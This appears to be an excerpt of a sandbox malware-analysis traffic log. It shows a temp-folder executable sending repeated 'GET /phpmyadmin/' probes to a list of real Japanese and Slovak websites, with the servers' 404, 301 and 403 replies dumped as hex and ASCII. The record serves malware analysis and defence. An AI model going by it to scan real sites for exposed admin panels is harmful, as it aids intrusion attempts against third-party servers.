                                                                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                Link: <https://nakacho.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:23 UTC16039INData Raw: 32 30 30 30 0d 0a 3c 21 2d 2d 20 34 30 34 2e 70 68 70 20 2d 2d 3e 0a 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: 2000... 404.php --> <!DOCTYPE html> <html lang="ja"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, user-scalable=yes, maximum-scale=1.0, minimum-scale=1.0"> <meta http-equiv="x-ua-compatible" content
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:23 UTC16384INData Raw: 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76
                                                                                                                                                                                                                                                                                                                                Data Ascii: kground-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: v
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:23 UTC11870INData Raw: 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 2d 2d 3e 0a 20 20 20 20 0a 0a 0a 09 09 09 3c 21 2d 2d 20 2f 6d 61 69 6e 20 2d 2d 3e 0a 0a 20 20 3c 21 2d 2d 20 2f 23 74 61 62 e3 80 80 e6 a8 aa e3 83 90 e3 83 8a e3 83 bc 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 20 69 64 3d 22 73 73 69 64 65 5f 62 61 6e 61 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 74 61 62 5f 73 69 64 65 62 61 6e 61 30 31 22 20 63 6c 61 73 73 3d 22 74 61 62 5f 62 61 6e 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 61 6b 61 63 68 6f 2e 63 6f 6d 2f 6f 74 6f 69 61 77 61 73 65 2f 22 3e 3c 2f 61 3e 20 0d
                                                                                                                                                                                                                                                                                                                                Data Ascii: ________________________________--> ... /main --> ... /#tab --> <div class="container" id="sside_bana"><div id="tab_sidebana01" class="tab_ban"><a href="https://nakacho.com/otoiawase/"></a>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                18192.168.2.451432162.43.104.1454435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: nakacho.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:23 UTC345INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                Link: <https://nakacho.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:23 UTC16039INData Raw: 61 63 65 31 0d 0a 3c 21 2d 2d 20 34 30 34 2e 70 68 70 20 2d 2d 3e 0a 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: ace1... 404.php --> <!DOCTYPE html> <html lang="ja"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, user-scalable=yes, maximum-scale=1.0, minimum-scale=1.0"> <meta http-equiv="x-ua-compatible" content
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:23 UTC16384INData Raw: 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d
                                                                                                                                                                                                                                                                                                                                Data Ascii: color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp-
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:23 UTC11847INData Raw: 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 2d 2d 3e 0a 20 20 20 20 0a 0a 0a 09 09 09 3c 21 2d 2d 20 2f 6d 61 69 6e 20 2d 2d 3e 0a 0a 20 20 3c 21 2d 2d 20 2f 23 74 61 62 e3 80 80 e6 a8 aa e3 83 90 e3 83 8a e3 83 bc 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 20 69 64 3d 22 73 73 69 64 65 5f 62 61 6e 61 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 74 61 62 5f 73 69 64 65 62 61 6e 61 30 31 22 20 63 6c 61 73 73 3d 22 74 61 62 5f 62 61 6e 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 61 6b 61 63 68 6f 2e 63 6f 6d 2f 6f 74 6f 69 61 77 61 73 65 2f 22 3e 3c 2f 61 3e 20 0d 0a 20 20 3c 21 2d 2d 20 2f 23 74 61 62 31 2e 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: ________________--> ... /main --> ... /#tab --> <div class="container" id="sside_bana"><div id="tab_sidebana01" class="tab_ban"><a href="https://nakacho.com/otoiawase/"></a> ... /#tab1.t


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                19192.168.2.45098046.229.230.44435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC239INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.abatek.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 240
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC240INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 62 61 74 65 6b 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.abatek.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                20192.168.2.450974185.32.160.104435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: detmar.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC296INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 Phusion_Passenger/6.0.14
                                                                                                                                                                                                                                                                                                                                Location: http://www.detmar.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Content-Length: 240
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC240INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 65 74 6d 61 72 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.detmar.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                21192.168.2.45098446.229.230.44435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC239INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.abatek.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 240
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC240INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 62 61 74 65 6b 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.abatek.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                22192.168.2.45129292.240.253.34435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eurokamen.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:26 UTC320INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                link: <https://eurokamen.sk/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                x-bver: v2
                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:26 UTC14158INData Raw: 33 37 34 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 73 6b 2d 53 4b 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 74 72 c3 a1 6e 6b 61 20 6e 65 6e c3 a1 6a 64 65 6e c3 a1 20 26 23 38 32 31 31 3b 20 45 55 52 4f 20 4b 41 4d 45 c5 87 2c 20 73 2e 72 2e 6f 2e 3c
                                                                                                                                                                                                                                                                                                                                Data Ascii: 3746<!DOCTYPE html><html lang="sk-SK"><head><meta charset='UTF-8'><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Strnka nenjden &#8211; EURO KAME, s.r.o.<
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:26 UTC16384INData Raw: 37 37 33 44 0d 0a 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 73 6d 61 6c 6c 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 65 64 69 75 6d 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d
                                                                                                                                                                                                                                                                                                                                Data Ascii: 773Dckground{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:26 UTC14154INData Raw: 79 2d 6d 69 67 72 61 74 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 34 2e 31 22 20 69 64 3d 22 6a 71 75 65 72 79 2d 6d 69 67 72 61 74 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 6e 6f 74 69 63 65 2d 66 72 6f 6e 74 2d 6a 73 2d 62 65 66 6f 72 65 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 63 6e 41 72 67 73 20 3d 20 7b 22 61 6a 61 78 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 65 75 72 6f 6b 61 6d 65 6e 2e 73 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 6e 6f 6e 63 65 22 3a 22 34 37 31 61 66 63 35 63 37 65 22 2c 22 68 69 64 65 45 66 66 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: y-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script><script async type="text/javascript" id="cookie-notice-front-js-before">/* <![CDATA[ */var cnArgs = {"ajaxUrl":"https:\/\/eurokamen.sk\/wp-admin\/admin-ajax.php","nonce":"471afc5c7e","hideEffe


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                23192.168.2.451290141.98.102.1944435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eshopy-katalog.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC280INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
                                                                                                                                                                                                                                                                                                                                retry-after: 599
                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC3557INData Raw: 44 44 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: DD9<!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="robots" content="noindex, nofollow, noarchive"> <title>Error 403</title


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                24192.168.2.451702217.26.54.214435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elrocket.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
